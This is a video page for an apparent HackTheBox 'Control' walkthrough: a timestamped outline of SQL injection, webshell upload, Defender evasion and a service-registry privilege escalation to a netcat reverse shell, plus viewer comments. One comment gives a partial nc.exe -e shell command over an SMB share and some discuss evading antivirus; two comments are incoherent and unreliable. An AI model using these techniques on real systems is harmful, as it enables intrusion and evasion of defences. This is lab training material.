HackTheBox - Control
Рет қаралды 36,615
Күн бұрын00:00 - Start
01:02 - Begin of nmap
04:00 - Checking out the webpage, notice an IP in the comments and run GoBuster to discover /uploads/. Run GoBuster on /uploads/ looking for PHP files
07:50 - Begin fuzzing Proxy Headers with wfuzz to access admin.php
12:30 - Using Python's netaddr to generate an IP List based upon subnet, discovering X-Forwarded-For: 192.168.4.28 allows access to admin.php
15:30 - Having BurpSuite automatically add the x-forwarded-for header to our requests
16:45 - Explaining a reason why this header exists in the first palce
19:25 - Discovering Union injection on the admin page
22:45 - Telling SQLMap to run in the background, while we manually enumerate this ourselves.
24:00 - Using Group_Concat to return multiple rows in a union injection and enumerate the INFORMATION_SCHEMA Database
33:30 - Using LOAD_FILE and TO_BASE64 in our SQL Injection to extract source code from the webserver
39:30 - Enumerating who has the FILE privilege in the database, showing SQLMAP gives us some bad info
48:50 - Grabbing user hashes out of the database with our injection then cracking them to discover hector's password
51:30 - Using OUTFILE in our injection to drop a php webshell to the server
58:05 - Having trouble getting a reverse shell back, assuming it is defender so changing the name of some functions to bypass it
1:04:02 - Using powershell to run a command as hector with the password we cracked from the database
1:08:15 - Running WinPEAS and going over what it finds, looks like it misses some permissions around editing services
1:14:30 - Looking at the PSReadLine directory to get some powershell history and a hint at enumerating permissions in the registry
1:15:40 - Running ConvertFrom-SddlString to make sense of the registry permissions
1:21:20 - Listing services on the box, then shrinking the number by only showing ones that run as LocalSystem with a Manual startup type
1:26:00 - Shrink the list some more by only showing the services that our user has permission to startup
1:35:30 - Showing the "SC" command cannot set the BinPath of services, need to do this via registry
1:38:00 - Changing the ImagePath of the wuauserv service in the registry via PowerShell
1:41:15 - Setting the ImagePath to be a reverse shell via netcat, then starting the service to get a shell as LocalSystem
@franciscorivera5396 4 жыл бұрын
The video is very complete. Thanks IPPSEC !! I used for wfuzz a list of SecLists headers: SecLists/Discovery/Web-Content/BurpSuite-ParamMiner/lower-case-headers using -H "FUZZ: 192.168.4.28"
@DaObvious1 4 жыл бұрын
You can go into the preferences in cherry tree and disable the curly quotes: Edit/Preferences/Text and uncheck, "Enable Smart Quotes Auto Replacement" box. I also have had hours wasted due to curly quotes lol. Great video! sqlmap can upload files to the box with the --file-write --file-dest flags. Glad you did it manually because i learned a lot more that way. U Da Man!
@letronghoangminh425 2 жыл бұрын
First time commenting on your video. Great knowledge learned about Windows services.
@pwndumb2903 4 жыл бұрын
Amazing video. The explanation about register and services is awesome.
@brettnieman3453 4 жыл бұрын
Thanks for the great content as always! Actually didn't know you could fuzz a second parameter in wfuzz -- thanks!!!
@isectech 4 жыл бұрын
@ippsec you said HackTheBox is rotating the flags but mine was same as your flag . Let me say thank you again for all you have done for us .
@ramarcr9454 4 жыл бұрын
i have searched to much for this method X-forwarded and finally you show . You are great man ! give me a copy of your brain :D :P
@EvilSapphireR 4 жыл бұрын
This is the most accessible, and downright the COOLEST video on hacking I've ever seen! As someone who's trying to get into malware analysis, this channel may just make me start preparing for my OSCP as well! So thankful for content like this on KZfaq!
@michaelyadidya8742 4 жыл бұрын
I am gonna be honest manually way just blew me up ! you crazy ippy! keep cracking!
@JonJon2040 4 жыл бұрын
Couple cool stuff I found out you can do on a Windows machine (for file IO and shells): 1. For uploading/downloading files, you can open an SMB share on your machine and use \\IP\share to access your files from the windows machine. 2. You can run nc.exe from your share in a webshell. For example, typing this in a webshell: \\IP\share c.exe -e blabla Will result in netcat being executed without defender killing it
@JonJon2040 4 жыл бұрын
I just find it more comfortable to use an smb share instead of an http server (which makes moving files from the remote machine to your local machine complicated)
@westernvibes1267 4 жыл бұрын
I got lucky, i saw a blog post about x forwarded the day before i attempted the box. After that it was straight forward. Great video
@xxxvenmxxx2269 4 жыл бұрын
Thank you for making this video.🙂
@yantingliu4722 4 жыл бұрын
Thanks a lot!! lm looking forward to see more of it
@alientec258 4 жыл бұрын
thank you for your very good work, good Video ...txs :)
@sakettestsakettest8009 4 жыл бұрын
This is awesome 👏 as usual. Fun fact: the moment he says i have wasted a lot of time in my life dealing with weird quotes (Me: Also with ping -n / ping -c) 1🤣😂🤣
@utku_yucel 4 жыл бұрын
You are the best, Thanks!
@Ms.Robot. 4 жыл бұрын
Sweet! 💗🧜♀️🧚♀️
@adv4170 4 жыл бұрын
Your mysql start with -skip-grant-tables or secure_file_priv="", that's why it ignore the file priv's maybe.
@mehul050 4 жыл бұрын
The only person whose "Please Subscibe and Support me on xyz" doesn't bother me at all
@jack_brannan 4 жыл бұрын
Thanks, Ippsec
@magnfiyerlmoro3301 2 жыл бұрын
So why winpeas didnt do the enumeration in a good way ?
@jwouter 4 жыл бұрын
Would love to see you do a video on antivirus ( win defender) evasion , that little trick opened my eyes ..... I usually just copy over nc to get my Shell on a windows defended box ..... keep up the great videos 😇
@ippsec 4 жыл бұрын
There is one and it’s specifically on defender...
@jwouter 4 жыл бұрын
🤓 must of missed it , thanks will check that out tomorrow
@Ivo-- 4 жыл бұрын
I generally use directory-list-lowercase-2.3-medium.txt when the server is Windows. It's faster and there's no multiple hits.
@ippsec 4 жыл бұрын
Good call.
@sidahmed5784 4 жыл бұрын
It's just a little confusion. IS_GRANTABLE means that you can grant this permission that you have. Take a look at the Doc here : dev.mysql.com/doc/refman/8.0/en/user-privileges-table.html dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_grant-option So seeing IS_GRANTABLE:NO, just means you can't grant this permission to another user.
@jwouter 4 жыл бұрын
Interesting why don’t you run a nmap - p - and a top 100 for udp ports as default part your enumeration? Or is this purely for the video ?
@ippsec 4 жыл бұрын
I do things like that on the easy boxes, which I haven’t done before. Don’t always show it because eats up time for no reason and it’s pretty rare for a HTB box to put something in a non standard port
@jwouter 4 жыл бұрын
IppSec fair enough , I did scan all ports and used the open winrm port to get a shell with Hector, didn’t go through the lfi nor the power shell reverse shell 🤓
@DFLMN 4 жыл бұрын
!!Powershell interesting information!! PS> (get-acl).accesstostring - I think this is much easier way to read ACL PS> (gwmi win32_operatingsystem).caption - maybe this Windows version detection method would be usefull PS> Get-hotfix - this will show you all installed hotfixes
@LordMogrein 4 жыл бұрын
48:24 - actually sqlmap said Y (you can count 8th field here - 45:41). I think N happened because sqlmap cracked and showed manager's password. Then awk considered password column for manager as 2 fields and wrongly counted the 8th field.
@jwouter 4 жыл бұрын
Why not use the lowercase word list ? Any reason to still use the full list?
@ippsec 4 жыл бұрын
Just habbit. lowercase one would be better.
@mdshahidurrahman8111 4 жыл бұрын
♥️
@marcvandenbroeck3792 4 жыл бұрын
the traffic comes out the http session the eventhandler in the DOM has a callback on promise to id="html"; once the session gets a MITM the browser collapse the DOM and the value is zero , check the session F12, the symlink uses cache on symbols in the SVG off the html5
@magnfiyerlmoro3301 2 жыл бұрын
Hi when I tried all the services in my variable canStart and i could not modify the imagepath as powershell tell me access denied to the registry due to security permissions its really weird can someone help me. I tought it was ok for AU users to modify such things in the registry
@anonymousanonymous6406 4 жыл бұрын
IPPSEC rocks
@mr.roboter 2 жыл бұрын
Thank you for dear ippsec teacher sir. Can I have a question? How can I bypass ssl error(tls version) in sqlmap attack. Please teach me.
@ippsec 2 жыл бұрын
Maybe try typing sqlmap ssl in ippsec.rocks
@marcvandenbroeck3792 4 жыл бұрын
check yhe php, magiccsrf.js, the cache runs on a win .lnk with a xmlhttps uri session in the loopback facing 8.8..8.0/24 underlying 10.10.10.10 but in binary the host 010.010.010.010 ==>8.8.8.8 ==> 8888, the session runs out the scope due the ip runs in NETLINK II , as censio gave, the sql comes from the browser indexDB
@semassalucdeo-gracias7559 3 жыл бұрын
Thank you for the nice video I am getting this error when trying to start a service running on after editing the imagePath PS HKLM:\SYSTEM\CurrentControlSet\Services\> start-service : Service 'DevicesFlow (DevicesFlowUserSvc)' cannot be started due to the following error: Cannot start service DevicesFlowUserSvc on computer '.'.
@semassalucdeo-gracias7559 3 жыл бұрын
I edited the path doing set-ItemProperty -path DevicesFlowUserSvc -Name ImagePath -Value "C:\Windows\Temp\test\prometheus.exe" And it worked fine
@mohammadabdussamad2258 4 жыл бұрын
There's another windows box which is vulnerable to this privesc.. but you have to hop three users 😉😉😉
@IteLuis 4 жыл бұрын
Yeah, I know which box you are taking about XD...
@MD4564 4 жыл бұрын
Any chance we can get a Burpsuite tutorial? I'm finding it hard to use this tool?
@b3twiise853 4 жыл бұрын
First!
@yakushitamahacka4199 4 жыл бұрын
Windows Defender blocking strings....this defence is not only useless but also can be abused in some cases for information leakage. Please AVs be better than defender....
@Reelix 4 жыл бұрын
File modification (Through detected strings or otherwise) is an extremely common bypass that works with all non-heuristic Anti-Viruses (Which themselves are so unreliable that they mark anything with the ability to update as malware) Anti-Viruses generally only detect what's in their DB, so anything custom-made will bypass them.
@yakushitamahacka4199 4 жыл бұрын
@@Reelix From what I remember most AVs have also some heuristics in addition to blacklisting. Some even mark as suspicious self signed exes or check the icons. I am not sure if they also perform sandbox execution by default. Generally really trivial to bypass like you said if you make your own malware. Of course things may be different for enterprise customers, or I hope it is at least.